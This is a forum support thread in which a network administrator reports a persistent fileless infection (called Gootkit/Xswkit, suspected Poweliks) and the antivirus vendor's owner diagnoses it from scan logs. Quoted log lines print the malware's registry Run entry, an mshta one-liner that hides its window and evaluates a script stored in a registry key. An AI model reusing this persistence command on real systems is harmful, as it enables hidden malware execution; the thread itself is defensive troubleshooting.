Author Topic: [Gootkit/Xswkit] New rootkit found!  (Read 15110 times)

0 Members and 1 Guest are viewing this topic.

December 22, 2014, 12:47:54 pm

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
[Gootkit/Xswkit] New rootkit found!
« on: December 22, 2014, 12:47:54 pm »
Hi,

We use Roguekiller for years and we found with it the best cleaning tool that we can add to our antivirus solution. You doing a great job and its a luck to being able to use your software to solve some crisis situations.

Sadly, we are reporting a new rootkit that have infected several computers on our network. This virus infect principal Windows process as "explorer.exe", "svchost.exe" and others by injecting his code on the fly. Roguekiller report the infection, can kill few infected process on memory but not clean it. Each time we make a scan with RK, the threat is back on the same process over and over.

In addition, the issue reported by our users is that they cannot work on their computer because the screen always flashing and showing a windows that ask to install a trusted certificate. The screen flashing because when the virus start its bad job, the antivirus (ESET Endpoint) kills the infected process but without being able to clean the infection. It seems that the virus only works completely on the user profil used to install it, we log on on the local administrator session without getting this error flashing message. But, even when we scan the system through this session, it reports some infested process (injected) but less.

You can find the RogueKiller's scan report and the screenshot of the error in this archive.

Hope you will provide a solution.

Best regards,


J. PEREIRA
« Last Edit: January 03, 2015, 03:56:59 pm by Tigzy »

Reply #1December 22, 2014, 02:36:53 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #1 on: December 22, 2014, 02:36:53 pm »
Hello
Any chance to get a explorer.exe full dump? I'd like to extract the payload, that should help us to put a name on the infection.

EDIT: also, could you analyse that file on virus total? C:\Windows\cwbrxd.exe

Reply #2December 22, 2014, 03:03:29 pm

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #2 on: December 22, 2014, 03:03:29 pm »
Hi!

Thanks for the quick answer!  :)

We have analysed the "cwbrxd.exe" file on VirusTotal but it doesn't report any infection. Through this link, you will find an archive with two "explorer.exe" dumps files because we found two of them in memory, but impossible to know which is the good one...

http://users.hexanet.fr/~pereira/explorer.zip

Thanks a lot for any help you can grant! :)

Best regards,


J. PEREIRA
« Last Edit: December 22, 2014, 03:11:24 pm by Jojo51 »

Reply #3December 22, 2014, 03:48:34 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #3 on: December 22, 2014, 03:48:34 pm »
Thanks, I'll take a look shortly.

Reply #4December 22, 2014, 04:42:07 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #4 on: December 22, 2014, 04:42:07 pm »
VT came back clean https://www.virustotal.com/fr/file/6c1b0f6a4a765ebac4d742f1d62ceace2339941482a19f56b81b2841575d3cd6/analysis/1419261925/
I can see openssl related code in the dumped section, but no string that could help us.

Can you scan with Malwarebytes?

Reply #5December 22, 2014, 05:37:24 pm

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #5 on: December 22, 2014, 05:37:24 pm »
Yes, we already did the Anti-Malware and even Anti-Rootkit scan, this afternoon for the third time. No infection reported by this tools.  :(

By the way, our ESET Antivirus report now a threat on its log, speaking about a "Kryptic" virus variant. If it can help...  ;)

Reply #6December 23, 2014, 09:11:31 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #6 on: December 23, 2014, 09:11:31 am »
Where is the threat reported?
Could be useful to scan with OTL: http://www.bleepingcomputer.com/download/otl/

Reply #7December 24, 2014, 10:20:58 am

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #7 on: December 24, 2014, 10:20:58 am »
Hi!

Still working hard on the subject without finding a solution. :(

We've done the scan with OTL as you asked in your last post, but it cannot clean anything too. :( You can find the log in attachment.

Thanks for your help! :)


J. PEREIRA

Reply #8December 29, 2014, 10:46:56 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #8 on: December 29, 2014, 10:46:56 am »
This is uncommon:

Quote
PRC - C:\Windows\SysWOW64\svchost.exe  [comLaunch] (Microsoft Corporation)
PRC - C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation)

on x64, having system processes on 32 bits can be suspicious.

And indeed:

Quote
O4 - HKU\.DEFAULT..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-18..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-19..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-20..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-21-1742386255-4278694884-558714565-500..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found

That looks like Poweliks.
Could you give me a dump (in raw hive format!) of the registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

It's very important, please.
EDIT: dump can be made with regedit, right click => export. chose the raw format, not .reg
« Last Edit: December 29, 2014, 10:51:31 am by Tigzy »

Reply #9December 29, 2014, 10:50:32 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #9 on: December 29, 2014, 10:50:32 am »
And also, please do the same for that key:

HKEY_CURRENT_USER\Software\ xsw\loader (mind the space)

Reply #10December 30, 2014, 05:56:04 pm

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #10 on: December 30, 2014, 05:56:04 pm »
Many thanks for your feeback, I will get the informations you need and send you as quick as possible ! :)

Reply #11December 31, 2014, 01:13:56 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #11 on: December 31, 2014, 01:13:56 pm »
By the way Malwarebytes should be able to remove it.

Reply #12January 02, 2015, 12:04:11 pm

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #12 on: January 02, 2015, 12:04:11 pm »
Hi!

First, I wish you all the best to all the Virus "Threat Fighters" for the new 2015 year!! :)

Back to the business...

Sorry for the delayed answers, I have investigated and spent a lot of time in this issue and discovered some usefull informations. So, thanks to your last message, I found infection in the registry at differents locations. The virus seems to put install itself in each NTUSER.DAT file that constitue the hive registry linked to each user. I each ones, I find track of it, here what it is :

Found an "xsw" registry key in HKEY_CURRENT_USER\Software\ xsw\
Found an "cxsw" registry key in HKEY_CURRENT_LOCAL_MACHINE\Software\
Found multiples binary in HKEY_CURRENT_USER\Software\ AppDataLow\
Found an value "Rundll32" in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Deleting the xsw registry key, binaries in AppDataLow and rundll32 value in RUN key seems to be good because the antivirus stop to report the threat after the reboot. BUT, the cxsw still comes back after the first reboot and the virus seems to be always in the system, RogueKiller still reporting the injected process in explorer.exe and others.

So, that is what I can bring you as new informations. At this address, http://users.hexanet.fr/~pereira/Virus.zip , you will find the dumps you asked, in differents formats to be sure you can exploit it. Anti-Malware doesn't solve anything, it even fail to report the infection... :(

Thanks again for your help, I hope that you will find the solution. :)

Best regards,

J. PEREIRA

Reply #13January 02, 2015, 01:28:32 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 808
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #13 on: January 02, 2015, 01:28:32 pm »
Ok gotcha.
I would need to have a dump of explorer.exe also, can you download/start process hacker and make a full dump of it? Also, do you have several explorer.exe processes? The dump is quite big, but you should be able to share it with Google Drive/Dropbox.
That would help me to make a signature for the injected process.

A things that may work for the removal:

- Start Roguekiller, the prescan will kill the injected processes. Leave it without doing the scan (won't find anything anyway)
- With regedit, go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run , and remove the rundll32 value.
- Reboot, let me know if the threat is gone.

Reply #14January 02, 2015, 03:14:19 pm

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #14 on: January 02, 2015, 03:14:19 pm »
Yes, here the new "explorer.exe" created via Process Hacker : http://users.hexanet.fr/~pereira/explorer.exe.dmp

Already done this with RogueKiller, but the threat is still back after the reboot. The most strange is that on some computers, the threat seems to no be completely installed because I cannot find all the tracks that we spoke about in my last post. But, error message that show the "certificate Installation" is still present, RogueKiller still find Injected proc in services.exe, isass.exe, explorer.exe etc...  >:(

That's an big one! :(